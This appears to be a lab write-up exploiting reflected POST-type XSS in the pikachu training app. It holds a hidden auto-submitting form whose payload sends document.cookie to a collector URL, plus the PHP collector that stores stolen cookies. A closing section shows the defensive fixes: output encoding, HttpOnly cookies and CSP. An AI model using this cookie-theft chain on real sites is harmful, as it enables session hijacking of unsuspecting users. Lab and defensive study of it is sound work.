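[XSS vulnerability] POST-type cookie capture and exploitation lab

1. Wrapper page that forges the request:

      *** Uses the style visibility:hidden to hide the form from view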

<html>
<head>
<script>
// Auto-submit the hidden form as soon as the page loads
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form style='visibility:hidden' method="post" action="http://192.168.88.128/pikachu/vul/xss/xsspost/xss_reflected_post.php">
    <input type="text" name="message" value=
    "<script>
document.location = 'http://192.168.88.128/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
	</script>"
	 />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

2. Attacker-side script that processes the captured cookie:


<?php
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();

// This is the API page that receives the cookie

if(isset($_GET['cookie'])){
    $time=date('Y-m-d g:i:s');
    $ipaddress=getenv ('REMOTE_ADDR');
    $cookie=$_GET['cookie'];
    $referer=$_SERVER['HTTP_REFERER'];
    $useragent=$_SERVER['HTTP_USER_AGENT'];
    $query="insert cookies(time,ipaddress,cookie,referer,useragent) 
    values('$time','$ipaddress','$cookie','$referer','$useragent')";
    $result=mysqli_query($link, $query);
}
header("Location:http://192.168.88.128/pikachu/index.php");// redirect to a trusted site

?>

3. The attacker logs in to the attack backend to view the result:

[Image 1: XSS vulnerability, POST-type cookie capture and exploitation lab]
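The chain above depends on two things: the POST value is reflected into the page unencoded, and the session cookie is readable through document.cookie. The following is an added example, not part of the original post or of pikachu's code, showing the vulnerable reflection beside a hardened one plus the cookie settings that keep the session out of script reach. The field name `message`, the output markup, the function names and the sample input are assumptions for illustration.

```php
<?php
// Added example: defensive handling of a reflected POST parameter.
// Field name "message", markup and sample input are assumed, not pikachu's code.

// 1) Session cookie flags. Must be set before session_start().
//    Skipped on the CLI, where there are no HTTP headers to send.
if (PHP_SAPI !== 'cli') {
    session_set_cookie_params([
        'httponly' => true,   // cookie is not exposed to document.cookie
        'secure'   => true,   // only sent over HTTPS (requires an HTTPS site)
        'samesite' => 'Lax',  // not attached to cross-site POST requests
    ]);
    session_start();
    // Defense in depth: refuse inline scripts even if encoding is missed somewhere.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

// Vulnerable pattern: the submitted value is placed into HTML as-is,
// so markup in the value becomes markup in the response.
function render_vulnerable(string $message): string
{
    return "<p class='notice'>You submitted: {$message}</p>";
}

// Hardened pattern: encode for the HTML context at output time.
// ENT_QUOTES also encodes ' and ", which matters inside attribute values.
function render_hardened(string $message): string
{
    $safe = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p class='notice'>You submitted: {$safe}</p>";
}

// Constructed sample input: an inert marker standing in for a script payload.
$message = $_POST['message'] ?? "<script>/* marker */</script>";

if (PHP_SAPI === 'cli') {
    // Side-by-side comparison when run as: php example.php
    echo "vulnerable: ", render_vulnerable($message), PHP_EOL;
    echo "hardened:   ", render_hardened($message), PHP_EOL;
} else {
    // A web request only ever gets the encoded form.
    echo render_hardened($message);
}
```

With HttpOnly set, script injected through a missed encoding still runs, but document.cookie no longer contains the session identifier, so the cookie-capture step has nothing to send.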
